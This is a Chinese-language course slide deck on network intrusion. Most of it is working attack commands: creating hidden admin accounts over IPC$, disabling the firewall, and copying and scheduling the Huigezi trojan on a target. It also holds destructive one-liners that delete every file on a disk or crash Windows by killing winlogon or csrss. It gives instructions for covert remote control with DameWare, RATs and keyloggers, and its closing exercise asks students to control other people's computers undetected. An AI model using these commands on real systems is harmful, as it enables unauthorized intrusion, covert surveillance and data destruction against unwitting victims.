网络安全攻防技术教程

网络入侵基础知识、入侵实战第2章李冰川QQ：594520163Email：aizhihuo218@163.comPage2章节目标常用的DOS命令常用的入侵命令Hack实战一：命令行下的入侵Hack实战二：图形界面的入侵流行远程控制木马的使用方法键盘记录程序的使用方法Page3常用DOS命令1Cd切换目录Dir列出所有文件信息Del删除文件Md创建目录Rd删除目录Copy复制Xcopy复制文件和文件夹Cls清屏Attrib修改文件、文件夹属性Date、Time显示日期、时间Page4常用DOS命令2Path系统路径Set显示、设置系统信息Ren(Rename)重命名Subst虚拟磁盘Ver显示操作系统版本Help帮助/?显示某条命令的帮助Page5非主流DOS命令11.重复执行某条命令直至死机的批处理代码：startcmd%02.复制一个文件的磁盘的每个子文件夹当中：for/r/d%ain(*)docopytest.txt%a/y3.不停地执行同一条命令：for/l%ain(1,0,2)donetsend192.168.1.1炸弹来了！4.死机,蓝屏ntsd-cq-pnwinlogon.exentsd-cq-pncsrss.exePage6非主流DOS命令25.删除磁盘所有文件：del*/a/s/q/f6.创建名字为空的文件夹：md(按住Alt键，在小键盘上按2,5,5,然后松开Alt,回车)7.创建无法删除的特殊名字文件夹：md\\.\c:\conmd\\.\c:\aux8.创建无法双击打开无法删除的另类文件夹：mdtest..\rdtest..\/s/dPage7常用入侵命令1netuser用户名密码/add(建立用户)netlocalgroupadministrators用户名密码/add(将用户加到管理员，使其拥有管理权限)netuserguest/active:Yes(激活guest用户)netuserguest12345(修改guest密码为12345)netuser(查看账号属性)netuse\\ip\ipc$“”/user(建立空IPC连接)netuse\\ip\ipc$“密码”/user:“用户名”(建立IPC非空连接，非空链接就是需要帐户和密码)netuse\\ip\ipc$/del(删除IPC空连接)netusez:\\127.0.0.1\c$(映射目标主机磁盘c盘到本地磁盘Z盘)Page8常用入侵命令2netstart(查看开启了哪些服务)netstart服务名(开启服务)nettime\\目标IP(查看对方时间)netview(查看局域网中开启了哪些共享)netshare(查看本地开启的哪些共享)netshareC$/del(删除C盘默认共享)netstat-an(查看计算机开放了哪些端口)Copyxx.exe\\ip\admin$\System32(将当前xx.exe复制到对方Admin$共享的System32目录内)Page9常用入侵命令3scconfigtlnesvrstart=auto(修改telnet服务的启动方式为自动，auto前面有一个空格)netstopsharedaccess(关闭系统自带的防火墙)netsendIP消息(利用messenger服务向目标IP发送消息)ntsd-cq-pnwinlogon.exe(蓝屏重启)ntsd-cq-pncsrss.exe(死机)tasklist(查看进程)taskkill(结束进程)Page10实战：纯DOS命令入侵netuse\\192.168.2.20\ipc$“123”/user:”administrator”nettime\\192.168.2.20Copyc:\server.exe\\192.168.2.20\admin$\svchost.exeAt\\192.168.2.2012:00startc:\windows\svchost.exe这样，对方就中了灰鸽子服务端了。Page11几个小例子开启禁用的telnet服务：scconfigtlntsvrstart=auto(auto前有空格)开启3389远程终端regadd开启C盘默认共享netsharec$=c:开启计划任务服务（at命令需要这一服务）netstartschedule开启远程注册表(RemoteRegistry)服务netstartremoteregistryPage12图形界面入侵一、计算机管理操作菜单连接到另一台计算机二、注册表编辑器文件菜单连接网络注册表三、第三方工具比如Dameware、PcanywhereDameware的使用方法演示演示Page13Dameware的隐藏用Dameware控制对方，要做到悄无声息，需要注意以下几点：点帮助菜单激活软件，输入注册码注册软件；在远程连接对话框上单击“设置”，勾选：“查看模式”和“显示远程鼠标指针”；切换到“安装选项”选项卡，勾选上“复制配置文件”然后点“编辑”：把“附加设置”选项卡上“允许托盘图标”勾掉再把“通知对话”选项卡上“连接时通知”勾掉。Page14XP默认不能远程控制的原因在运行中输入命令secpol.msc打开安全策略展开“本地策略”“安全选项”(红色表示默认选项)“安全选项：本地账户的共享和安全模式”•经典，表示在远程可以拥有管理员权限•仅来宾，表示在远程只能拥有guest权限“账户：使用空白密码的账户只允许进行控制台登录”•启用，账户密码为空则不允许远程访问•禁用，账户密码为空也允许远程访问所以，要想控制系统为XP的计算机，必须考虑对方安全策略的设置安全策略的设置不影响利用木马进行控制Page15灰鸽子以华夏灰鸽子2009为例，注意事项：IP地址栏一定要填写自己的IP地址，而且不要忘了加上冒号和端口号Page16PcShare使用方法和灰鸽子类似Page17键盘记录以“keyghost”和“简单键盘记录程序”为例Page18实验任务练习前面PPT中的DOS命令开一台2003虚拟机，利用命令入侵，以能够telnet到对方电脑为入侵成功的标志开一台2003虚拟机，利用图形界面入侵，以能够控制对方桌面为入侵成功的标志使用远控软件Dameware控制别人电脑（要求：悄无声息，不能被对方发现）利用灰鸽子控制别人电脑